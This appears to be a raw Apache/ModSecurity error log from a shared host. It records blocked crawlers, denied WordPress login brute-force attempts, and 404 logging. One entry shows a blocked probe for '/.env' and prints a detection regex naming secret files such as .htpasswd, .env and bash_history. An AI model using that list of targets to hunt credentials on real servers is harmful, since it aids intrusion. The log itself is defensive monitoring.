[Tue May 26 19:08:52.208768 2026] [security2:error] [pid 6038:tid 6268] [client 77.75.78.161:2215] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/the-story-of-baby-sitting-has-just-gone-viral/"] [unique_id "ahWibFHA3ZmGrHHEr4qy4AAAAOk"]
[Tue May 26 19:08:54.023650 2026] [security2:error] [pid 6038:tid 6218] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWibVHA3ZmGrHHEr4qzDAAAALc"]
[Tue May 26 19:08:54.095334 2026] [security2:error] [pid 6038:tid 6170] [client 165.227.90.191:54428] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "plenitudotonal.jhonweb.com"] [uri "/index.php"] [unique_id "ahWibVHA3ZmGrHHEr4qy-AAAAIc"], referer: http://plenitudotonal.jhonweb.com/
[Tue May 26 19:08:54.905772 2026] [security2:error] [pid 6038:tid 6184] [client 66.249.70.96:59933] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "inicial449sanluis.edu.pe"] [uri "/robots.txt"] [unique_id "ahWiblHA3ZmGrHHEr4qzMQAAAJU"]
[Tue May 26 19:08:55.043021 2026] [security2:error] [pid 6038:tid 6074] [remote 162.214.206.32:33938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiblHA3ZmGrHHEr4qzMAAAuSM"]
[Tue May 26 19:08:55.211604 2026] [security2:error] [pid 6038:tid 6148] [remote 162.214.206.32:33938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWib1HA3ZmGrHHEr4qzOAAA7G0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:55.365765 2026] [security2:error] [pid 6038:tid 6258] [client 66.132.172.41:33598] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWib1HA3ZmGrHHEr4qzPwAAAN8"]
[Tue May 26 19:08:56.715948 2026] [security2:error] [pid 6038:tid 6168] [client 165.227.90.191:36404] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "plenitudotonal.jhonweb.com"] [uri "/index.php"] [unique_id "ahWicFHA3ZmGrHHEr4qzbQAAAIU"], referer: https://plenitudotonal.jhonweb.com/
[Tue May 26 19:08:56.995597 2026] [security2:error] [pid 6038:tid 6184] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWicFHA3ZmGrHHEr4qzbAAAAJU"]
[Tue May 26 19:08:58.334156 2026] [security2:error] [pid 6038:tid 6176] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWicVHA3ZmGrHHEr4qzlgAAAI0"]
[Tue May 26 19:08:59.755735 2026] [security2:error] [pid 6038:tid 6054] [remote 45.148.79.194:38977] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWic1HA3ZmGrHHEr4qz7QAAkw8"], referer: https://panda-eco.com
[Tue May 26 19:08:59.784680 2026] [security2:error] [pid 6038:tid 6048] [remote 116.203.77.78:53950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.77.203.116.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWic1HA3ZmGrHHEr4qz7gAAqAk"]
[Tue May 26 19:09:00.297056 2026] [security2:error] [pid 6038:tid 6049] [remote 116.203.77.78:53950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.77.203.116.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWidFHA3ZmGrHHEr4q0EAAApAo"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:09:00.726056 2026] [security2:error] [pid 6038:tid 6228] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWidFHA3ZmGrHHEr4q0EwAAAME"]
[Tue May 26 19:09:02.432822 2026] [security2:error] [pid 6038:tid 6219] [client 178.62.253.225:47534] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "carpetagrafica.jhonweb.com"] [uri "/index.php"] [unique_id "ahWidlHA3ZmGrHHEr4q0dAAAALg"], referer: http://carpetagrafica.jhonweb.com/
[Tue May 26 19:09:02.551318 2026] [security2:error] [pid 6038:tid 6276] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWidlHA3ZmGrHHEr4q0bQAAAPE"]
[Tue May 26 19:09:04.374283 2026] [security2:error] [pid 6038:tid 6120] [remote 198.244.240.35:44490] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "usteve.com"] [uri "/robots.txt"] [unique_id "ahWieFHA3ZmGrHHEr4q0qQAA8lE"]
[Tue May 26 19:09:04.374519 2026] [security2:error] [pid 6038:tid 6277] [client 198.244.240.35:44490] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "usteve.com"] [uri "/robots.txt"] [unique_id "ahWieFHA3ZmGrHHEr4q0qQAA8lE"]
[Tue May 26 19:09:04.662900 2026] [security2:error] [pid 6038:tid 6181] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWieFHA3ZmGrHHEr4q0owAAAJI"]
[Tue May 26 19:09:05.101574 2026] [security2:error] [pid 6038:tid 6092] [remote 109.228.50.118:49222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWieFHA3ZmGrHHEr4q0uQAA7DU"]
[Tue May 26 19:09:05.507224 2026] [security2:error] [pid 6038:tid 6084] [remote 35.176.253.230:39524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWieVHA3ZmGrHHEr4q0xAABAy0"]
[Tue May 26 19:09:05.902393 2026] [security2:error] [pid 6038:tid 6070] [remote 35.176.253.230:39524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWieVHA3ZmGrHHEr4q01gAAsx8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:09:05.923387 2026] [security2:error] [pid 6038:tid 6068] [remote 142.44.228.182:26842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "usteve.com"] [uri "/"] [unique_id "ahWieVHA3ZmGrHHEr4q02gAA8B0"]
[Tue May 26 19:09:05.923548 2026] [security2:error] [pid 6038:tid 6275] [client 142.44.228.182:26842] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "usteve.com"] [uri "/"] [unique_id "ahWieVHA3ZmGrHHEr4q02gAA8B0"]
[Tue May 26 19:09:06.530109 2026] [security2:error] [pid 6038:tid 6235] [client 144.76.32.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWielHA3ZmGrHHEr4q04AAAAMg"]
[Tue May 26 19:09:06.956482 2026] [security2:error] [pid 6038:tid 6283] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWielHA3ZmGrHHEr4q06wAAAPg"]
[Tue May 26 19:09:06.981818 2026] [security2:error] [pid 6038:tid 6295] [client 178.62.253.225:36402] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "carpetagrafica.jhonweb.com"] [uri "/index.php"] [unique_id "ahWielHA3ZmGrHHEr4q08gAAAQQ"], referer: https://carpetagrafica.jhonweb.com/
[Tue May 26 19:09:08.334763 2026] [security2:error] [pid 6038:tid 6103] [remote 103.95.119.103:45688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWifFHA3ZmGrHHEr4q1FAAArkA"]
[Tue May 26 19:09:08.979911 2026] [security2:error] [pid 6038:tid 6223] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWifFHA3ZmGrHHEr4q1HgAAALw"]
[Tue May 26 19:09:09.798054 2026] [security2:error] [pid 6038:tid 6174] [client 74.7.230.18:54030] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.madhuraclinic.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWifVHA3ZmGrHHEr4q1QgAAi1I"]
[Tue May 26 19:09:11.236610 2026] [security2:error] [pid 6038:tid 6177] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiflHA3ZmGrHHEr4q1XwAAAI4"]
[Tue May 26 19:09:13.220002 2026] [security2:error] [pid 6038:tid 6227] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWigFHA3ZmGrHHEr4q1uAAAAMA"]
[Tue May 26 19:09:13.547771 2026] [security2:error] [pid 6038:tid 6196] [client 176.65.139.229:35824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "quincaillerie.azurmediatec.com"] [uri "/.env"] [unique_id "ahWigVHA3ZmGrHHEr4q15wAAAKE"]
[Tue May 26 19:09:14.343396 2026] [security2:error] [pid 6038:tid 6154] [remote 168.63.79.147:50656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiglHA3ZmGrHHEr4q2CgAApnM"]
[Tue May 26 19:09:14.360387 2026] [security2:error] [pid 6038:tid 6236] [client 146.174.181.221:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWigVHA3ZmGrHHEr4q1_AAAAMk"]
[Tue May 26 19:09:15.030420 2026] [security2:error] [pid 6038:tid 6048] [remote 168.63.79.147:50656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiglHA3ZmGrHHEr4q2PAAA_Ak"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:09:15.384799 2026] [security2:error] [pid 6038:tid 6295] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWig1HA3ZmGrHHEr4q2VAAAAQQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:09:15.446752 2026] [security2:error] [pid 6038:tid 6271] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiglHA3ZmGrHHEr4q2PwAAAOw"]
[Tue May 26 19:09:17.060498 2026] [security2:error] [pid 6038:tid 6258] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWihFHA3ZmGrHHEr4q2gwAAAN8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 19:09:17.401994 2026] [security2:error] [pid 6038:tid 6220] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWihFHA3ZmGrHHEr4q2gAAAALk"]
[Tue May 26 19:09:19.538060 2026] [core:error] [pid 6038:tid 6257] [client 194.163.172.80:57422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: binance.com
[Tue May 26 19:09:19.538083 2026] [core:error] [pid 6038:tid 6257] [client 194.163.172.80:57422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: binance.com
[Tue May 26 19:09:19.861094 2026] [security2:error] [pid 6038:tid 6244] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWih1HA3ZmGrHHEr4q2wAAAANE"]
[Tue May 26 19:09:20.385311 2026] [security2:error] [pid 6038:tid 6264] [client 66.249.66.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWihlHA3ZmGrHHEr4q2rAAAAOU"]
[Tue May 26 19:09:21.914569 2026] [security2:error] [pid 6038:tid 6188] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiiVHA3ZmGrHHEr4q3RQAAAJk"]
[Tue May 26 19:09:21.914602 2026] [security2:error] [pid 6038:tid 6188] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiiVHA3ZmGrHHEr4q3RQAAAJk"]
[Tue May 26 19:09:21.915062 2026] [security2:error] [pid 6038:tid 6262] [client 65.109.156.37:51346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWiiVHA3ZmGrHHEr4q3QwAAAOM"]
[Tue May 26 19:09:22.007922 2026] [security2:error] [pid 6038:tid 6195] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiiVHA3ZmGrHHEr4q3MwAAAKA"]
[Tue May 26 19:09:22.332519 2026] [security2:error] [pid 6038:tid 6178] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiilHA3ZmGrHHEr4q3YAAAAI8"]
[Tue May 26 19:09:22.332579 2026] [security2:error] [pid 6038:tid 6178] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiilHA3ZmGrHHEr4q3YAAAAI8"]
[Tue May 26 19:09:22.332800 2026] [security2:error] [pid 6038:tid 6234] [client 65.109.156.37:51499] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWiilHA3ZmGrHHEr4q3XgAAAMc"]
[Tue May 26 19:09:23.142143 2026] [security2:error] [pid 6038:tid 6097] [remote 141.138.139.98:35108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWiilHA3ZmGrHHEr4q3kAAA-To"]
[Tue May 26 19:09:23.509095 2026] [security2:error] [pid 6038:tid 6121] [remote 141.138.139.98:35108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWii1HA3ZmGrHHEr4q3qgAAu1I"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:09:24.176568 2026] [security2:error] [pid 6038:tid 6193] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWii1HA3ZmGrHHEr4q3uQAAAJ4"]
[Tue May 26 19:09:24.382748 2026] [security2:error] [pid 6038:tid 6101] [remote 162.240.52.198:56458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWijFHA3ZmGrHHEr4q30QAAsD4"]
[Tue May 26 19:09:26.205370 2026] [security2:error] [pid 6038:tid 6124] [remote 162.240.52.198:56458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWijlHA3ZmGrHHEr4q4CwABA1U"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:09:26.314728 2026] [security2:error] [pid 6038:tid 6253] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWijVHA3ZmGrHHEr4q4BgAAANo"]
[Tue May 26 19:09:28.534569 2026] [security2:error] [pid 6038:tid 6186] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWikFHA3ZmGrHHEr4q4QgAAAJc"]
[Tue May 26 19:09:30.347267 2026] [security2:error] [pid 6038:tid 6233] [client 185.191.171.11:59304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWiklHA3ZmGrHHEr4q4igAAAMY"]
[Tue May 26 19:09:30.347456 2026] [security2:error] [pid 6038:tid 6233] [client 185.191.171.11:59304] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWiklHA3ZmGrHHEr4q4igAAAMY"]
[Tue May 26 19:09:30.640800 2026] [security2:error] [pid 6038:tid 6285] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiklHA3ZmGrHHEr4q4hgAAAPo"]
[Tue May 26 19:09:32.802411 2026] [fcgid:warn] [pid 6038:tid 6220] (70014)End of file found: [client 66.132.195.112:45838] mod_fcgid: can't get data from http client
[Tue May 26 19:09:32.895935 2026] [security2:error] [pid 6038:tid 6250] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWilFHA3ZmGrHHEr4q4vgAAANc"]
[Tue May 26 19:09:34.829430 2026] [security2:error] [pid 6038:tid 6169] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWillHA3ZmGrHHEr4q47wAAAIY"]
